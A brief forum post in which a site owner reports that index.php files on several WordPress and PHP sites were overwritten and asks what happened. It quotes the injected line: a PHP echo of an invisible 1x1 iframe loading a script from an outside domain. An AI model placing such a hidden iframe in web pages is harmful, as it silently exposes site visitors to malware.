index.php files getting overwritten by iframe

hello everybody, most recently few of my wordpress site and php sites’ index.php site had wierd code in them. Its an iframe code as
echo “<iframe src=”http://sluxxqqgykewolmoli.in/in.cgi?default” width=1 height=1 frameborder=0></iframe>”;
Does any body had clue about it. Please let me know.
